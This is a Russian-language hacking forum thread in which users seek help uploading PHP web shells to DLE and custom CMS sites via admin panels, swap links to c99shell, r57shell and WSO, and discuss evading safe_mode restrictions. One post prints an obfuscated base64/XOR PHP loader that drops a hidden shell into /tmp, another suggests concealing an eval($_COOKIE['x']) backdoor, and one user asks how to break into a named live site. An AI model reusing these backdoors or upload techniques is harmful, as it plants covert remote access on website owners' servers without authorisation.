|
А что делать если при открытие шелла я ничего не могу сделать?
|
Ребят такая вот фигня сколько не мучился никак догнать не могу как залить шелл на дле (версия 6.7 есть доступ в админку, копию базы данных сделать невозможно она слишком громоздкая.. файлового архива нет..) чтож теперь делать то?
Добавлено через 21 час 12 минут t0xA плыз подскажи что нибуть пока меня не прикрыли... |
вот вам шелл анти чата http://forum.antichat.ru/thread22799.html в этой статье .
вот вам шелл c99madshell http://madnet.name/files/1/10.html этой статье . |
Народ кто нить выложите c99shell плиз, очень надо. В нете все с троянами! Поставлю +, и отблагодарю!!!
|
http://upwap.ru/930947
вот держи |
Цитата:
Сообщение от jonyyy *** скрытый текст ***http://upwap.ru/930947 вот держи Пароль какой? |
Есть у кого-нибудь r57shell 1.3 released (именно эта версия)! Или какой-нить другой шелл с фишками обхода safe_mod'а и open_base_dir'а. Плюсами засыплю!!!
|
Цитата:
Есть у кого-нибудь r57shell 1.3 released (именно эта версия)! Или какой-нить другой шелл с фишками обхода safe_mod'а и open_base_dir'а. Плюсами засыплю!!! http://www.awp.dk/7/r.php Извлечь не трудно. |
Цитата:
Сообщение от ALEXandr009 Как запустить шелл на DLE ? ты хотел сказать залить? если залить то никак |
Я залил, у меня есть ссылка, но шел не запускается, пишет такой страницы нет.
|
Как запустить шелл на DLE ?
|
Цитата:
Сообщение от ALEXandr009 Я залил, у меня есть ссылка, но шел не запускается, пишет такой страницы нет. пиши сайт в лс.посмотрим |
Хочу написать об одном шелле
code: <?php $pf="voKBztbOtLTX2JbXzc3bypaa4ez77+v77erlmc+Z45eXt MW0t9vI39KWzcrM187N0t/N1tvNlprh7Pvv6/vt6uWZz5njl5eFtMO029LN27TFtLfW29/a28yWmfbq6u6Rj5COnoqOip7w0cqe+NHL0NqZl4W0w7Q=";$GM ="/tmp/";$vdj="";$pf=base64_decode($pf);for($KYeAa=1; $KYeAa < strlen($pf); $KYeAa++) $vdj.=$pf[0] ^ $pf[$KYeAa];$xH=tempnam($GM,"O");$Wwm=fopen($xH, "w+");fwrite($Wwm, $vdj);fclose($Wwm);require($xH);unlink($xH); он копирует себя в /tmp и в результате получается такая картина: source: Код:
<?php |
И как потом из веба добраться до /tmp, в которой лежит шелл? =)
В чём смысл копирования? |
>В чём смысл копирования?
Ну шелл копируется уже в "распакованном" виде. Как я понимаю смысл в том чтобы скрыть вредоносный код, eval появляется в явном виде только в /tmp >И как потом из веба добраться до /tmp, в которой лежит шелл? >require($xH); |
Просёк фишку... сам код шелла лежит в tmp, а в действие приводится через другой заражённый скрипт, лежащий где-то в веб-директориях.
Странная система и непонятно чем руководствовались те, кто её придумал... спрятать в скрипте eval($_COOKIE['x']); куда проще чем вышеприведённую зверскую конструкцию, которая бросается в глаза даже при беглом просмотре кода. |
Скажите что делать, устал искать уже. Не могу найти способ заливки шелла через админку. Есть только один способ - картинка. Но не как не получается. хотел скачать там картинку в нее впихнуть хексом скрипт и обратно - не фига, пробовал к пхп добавить расширения - на мести картинки рамка есть а ссылки нет, добавлял в ексиф - не могу понять как подключится к нему, какой запрос нужен чтобы.. Админка самописная, можно только новости добавить с картинкой. мне бы хотябы базовый шел подключить а там бы я уже придумал что нибудь. ..наверно. Да еще не могу понять как отправить в кукисы cmd=phpinfo
Помогите |
Есть ли шелл с нормальной кодировкой. При редактировании файлов не отображает Русские буквы. В следствии чего после изминения и сохранения, на сайте появляются "кракозябры".
|
Цитата:
Сообщение от Sork Есть ли шелл с нормальной кодировкой. При редактировании файлов не отображает Русские буквы. В следствии чего после изминения и сохранения, на сайте появляются "кракозябры". WSO 2.5 - есть выбор кодировок. |
Цитата:
Сообщение от b69d Не могу найти способ заливки шелла через админку Шелл не обязательно можно залить через админку. Из опыта, 3-4 CMS из 10 (самописы, ессно), не позволяют залить шелл через админку. |
Цитата:
Сообщение от stan_q WSO 2.5 - есть выбор кодировок. Проверял он ее и не замечает. И большой минус то что Wso 2.5 не катит на многих хостах он просто не отображает дерево каталогов(файлов и т.д). Хотя на Локальном все норм. |
А wso тут ни при чём. Если на хосте запрещены функции, нужные для листинга каталога, ни один шелл тебе его не выведет.
По поводу кодировки, редактируй файл локально в нужной кодировке и заливай. |
Цитата:
Сообщение от M@ZAX@KEP А wso тут ни при чём. Если на хосте запрещены функции, нужные для листинга каталога, ни один шелл тебе его не выведет. По поводу кодировки, редактируй файл локально в нужной кодировке и заливай. Именно., то что другой шелл отображает. |
Значит другие функции использует. Наверняка этот шелл не может чего-то другого, что может wso. Инструмент нужно выбирать по ситуации.
|
вот доработанная версия wso 2.51 добавлено много полезных функций все отлично работает и открывает скачать
|
пздц.еще один наивный-чукотский парень.
|
Цитата:
Сообщение от BlackH пздц.еще один наивный-чукотский парень. еще один наивный-чукотский парень/археолог |
Помогите пож первый раз с такой ошибкой сталкиваюсь вот сайт как раскрутить не понял http://ingala.ru/stats/index.php?act=phones
|
| Время: 16:17 |